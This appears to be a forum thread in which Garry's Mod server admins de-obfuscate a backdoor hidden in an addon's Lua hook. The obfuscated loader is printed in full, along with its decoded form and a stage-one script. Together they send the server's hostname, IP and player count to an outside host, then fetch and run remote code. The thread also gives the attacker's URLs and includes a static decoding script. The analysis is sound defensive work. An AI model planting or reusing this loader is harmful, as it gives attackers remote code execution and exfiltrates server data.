Need help with de-obfuscating this hook

So I’m doing a job for someone and one of their addons on the server has this hook:



[lua]
hook.Add("\84\104\105\110\107","\67\67\67", function()  RunString("function util.ABCDEFGEEZGEEGZGE( data ) local  b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if  !data then return end data = string.gsub(data, '[^'..b..'=]', '') return  (data:gsub('.', function(x) if (x == '=') then return '' end local  r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0  && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?',  function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do  c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c)  end)) end  http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=')),function(body,len,headers,code)  RunString(body) end)")
hook.Remove("\84\104\105\110\107","\67\67\67") end)
[/lua]

Can anyone help me find out what this is? It looks suspicious as shit

Could it be that it's inside sh_blockbelier.lua?
I've seen the name util.ABCDEFGEEZGEEGZGE once, and then it was a payload from a French PrisonRP server.
First it loaded a second resolve function for stage 2, collected player count, IP and hostname, and then it just resolved to an empty print. Just comment it out, and if the addon still works, up you go.

I’ll take a crack at it.

So far I’ve got:
[lua]
local code = [[
function util.ABCDEFGEEZGEEGZGE( data )
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
if !data then return end

data = string.gsub( data, '[^'..b..'=]', '' )
return ( data:gsub( '.', function( x )
	if ( x == '=' ) then return '' end
	local r, f='', ( b:find( x )-1 )
	for i=6, 1, -1 do
		r=r..( f%2^i-f%2^( i-1 )>0 && '1' || '0' )
	end
	return r;
end ):gsub( '%d%d%d?%d?%d?%d?%d?%d?', function( x )
	if ( #x ~= 8 ) then return '' end
	local c=0 for i=1, 8 do
		c = c+( x:sub( i, i ) == '1' && 2^( 8-i ) || 0 )
	end
	return string.char( c ) end ) )

end

http.Fetch( string.reverse( util.ABCDEFGEEZGEEGZGE( 'cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=' ) ), function( body, len, headers, code )
	RunString( body )
end )

]]

hook.Add("Think", "CCC", function()
RunString(code)
hook.Remove("Think", "CCC")
end)
[/lua]

All it's doing is hiding the URL, really. Here, I'll grab the URL by running the function now.

[editline]a[/editline]

http://137.74.231.80/dracaufeu/core/stage1.php
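The same two hiding tricks (decimal-escaped hook names, and a base64 string that is decoded and then string.reverse()'d) can be undone statically without executing any of the sample. This is an added example, not code from the thread; SAMPLE is constructed from the hook posted above, and the regexes assume that exact shape of obfuscation.

```python
import base64
import re

# Constructed sample: the one-line hook from the thread, trimmed to the parts
# that carry the hidden strings (escaped hook names and the base64 argument).
SAMPLE = (r'hook.Add("\84\104\105\110\107","\67\67\67", function() RunString("'
          r"http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE("
          r"'cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=')),"
          r'function(body,len,headers,code) RunString(body) end)") end)')


def decode_lua_escapes(s):
    r"""Turn Lua decimal escapes such as \84\104 into the characters they encode."""
    return re.sub(r"\\(\d{1,3})", lambda m: chr(int(m.group(1))), s)


def decode_reversed_b64(s):
    """Undo the sample's base64-decode-then-string.reverse() hiding of a URL."""
    clean = re.sub(r"[^A-Za-z0-9+/]", "", s)  # the Lua decoder drops junk too
    clean += "=" * (-len(clean) % 4)          # the sample's own padding is short
    return base64.b64decode(clean).decode("latin-1")[::-1]


def triage(lua_source):
    """Static triage of a snippet shaped like SAMPLE: no Lua is run."""
    escaped = [decode_lua_escapes(m)
               for m in re.findall(r'"((?:\\\d{1,3})+)"', lua_source)]
    # Argument literal handed to the reversed-base64 decoder (any util.* name).
    b64_args = re.findall(r"string\.reverse\(\s*util\.\w+\(\s*'([^']+)'", lua_source)
    return {
        "decoded_strings": escaped,
        "urls": [decode_reversed_b64(a) for a in b64_args],
        # The fetched body is passed straight to RunString: remote code execution.
        "executes_remote_code": bool(re.search(r"RunString\(\s*body\s*\)", lua_source)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```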

Yeah it still works without the hook but this is more a curiosity thing.

I remember way back there used to be code similar to this in some workshop addon that collected data to find out who’s using the addon

eventually does this



[lua]
http.Fetch( "http://137.74.231.80/dracaufeu/core/stage1.php", function( body, len, headers, code )
    RunString( body )
end )
[/lua]


Appreciate it guys

[editline]6th August 2016[/editline]

So it is running code through the http, huh

Multistaged as well

[editline]6th August 2016[/editline]



[lua]
// Stage One
timer.Create( "LaunchGet", 23, 0, function()
	local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() }
	http.Post( "http://137.74.231.80/dracaufeu/core/stage2.php", a, function( body, len, headers, code )
		RunString(body)
	end)
end)
[/lua]



He didn’t add a second stage, guess that would have been eventually

Is it possible that it only serves the second stage if the parameters are valid?

After reading the stages, I believe it's meant to be a thing where he makes specific hacks for a given IP address.

[editline]6th August 2016[/editline]

eg, give community 1 this hack, community 2 this one, etc

When served valid parameters (specifically a = { n = "Eat my ass.", nb = "999", i = "127.0.0.1" }), the server responds with "PrintMessage(10,'')".

Interedasting http://137.74.231.80/dracaufeu/core/

http://137.74.231.80/dracaufeu/core/ajax/error_log

Out of curiosity, how do you guys decode these sorts of things? At best Google shows me it's a bytecode, but I'm not actually sure what to do with that.

Started by figuring out the hook names; you can just print the string to get the unescaped values. Then I formatted the code block, and realized I didn't need to understand it to get the URL; I just fed the function into Lua and instead of http.Fetch I print()'d it.

[editline]6th August 2016[/editline]

This is god tier. I’m guessing he posts to those files to create and remove payloads. I bet he doesn’t auth either.

Seems to use a database to store payloads?

What do you want to bet it’s secured correctly?

This isn’t from a ScriptFodder addon is it?
Seems dodgy as shit and I have seen other DRM type code very similar to this one (Bus System - ElGringo) get removed because of it.

LMAO he doesn’t auth

god-tier copy+paste detected

>Redirect to BaguetteRP

looks like we cracked the mystery; a frenchie has compromised some servers

It's not from an SF addon, no, it's from a privately made addon that someone had "full permission to post publicly".

Main server file had this in it, had a feeling it was no good, and look at that.

:snip:

[editline]aww[/editline]

Update: server is closed :frowning:
Which one of you told him? Or does he monitor his server 24/7…